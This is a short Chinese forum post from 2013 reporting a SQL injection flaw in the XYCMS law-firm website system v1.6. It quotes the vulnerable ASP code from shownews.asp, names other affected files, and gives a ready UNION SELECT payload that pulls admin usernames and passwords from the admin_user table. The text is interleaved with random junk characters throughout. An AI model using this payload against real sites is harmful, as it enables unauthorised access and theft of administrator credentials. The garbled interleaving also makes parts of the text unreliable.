前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
' p, h1 i$ } q- T5 J
" R0 G9 z$ I* G1 h4 ?1 f, ^淫荡分割线
4 D8 V! Y: I6 P0 y+ I--------------------------------------------------------
) e8 U1 `8 ]2 t/ V4 [4 H0 N
P) {3 m- k/ ?4 h, l3 [9 X审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)' V( j5 k- H/ d/ @- i6 Y" w3 m+ ~" R Q
源码地址:http://down.chinaz.com/soft/29233.htm
' J) s% ]" ]0 w+ p , p2 r+ ^$ J1 z+ O. g1 A
漏洞文件:shownews.asp
# Q7 [( K) s: r1 b$ f/ p漏洞代码:7-13行
, }- v6 r) b( E3 I( \+ D. F ! E, W) u5 d/ w
! A; M# Y6 W) c8 K. w/ z" y<%
2 Q9 _/ a. s0 jid=request.QueryString("id")9 [5 o. g( R6 B, j* S
# g1 v6 r$ U }# v9 Wset snews=server.createobject("adodb.recordset") - o: R f0 g% x* @7 ^, x
exec="select * from [news] where id="&id W; h4 @/ B9 P5 F2 a, m
snews.open exec,conn,1,1
' B# Y3 x, R+ H- n: ?%>' M h% S" @' c Q8 ?
6 q6 |) P1 ?4 ]( ?7 z
4 `% B7 e3 ]/ d. I8 x什么过滤都没有 直造成注入 [2 q1 c4 f, ?! ^, s+ c: ~6 [
X# q& `( P! v注入点:http://127.0.0.1:99/shownews.asp?id=xx
; @. L- f/ b: f+ z4 B% i4 V8 @ . d' C8 @2 G n. o1 l! |- A3 J: m
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
! K. V- `' A5 U. S & j8 A% T3 L g3 l
" J& S( [( g- S7 s; r3 e* Y
exp: union select 1,admin,password,4,5,7 from admin_user
6 {' P# G3 M. X" e# l
# |& P S5 K+ R e* a |
发表于 2013-4-4 17:28:12
收藏
分享
支持
反对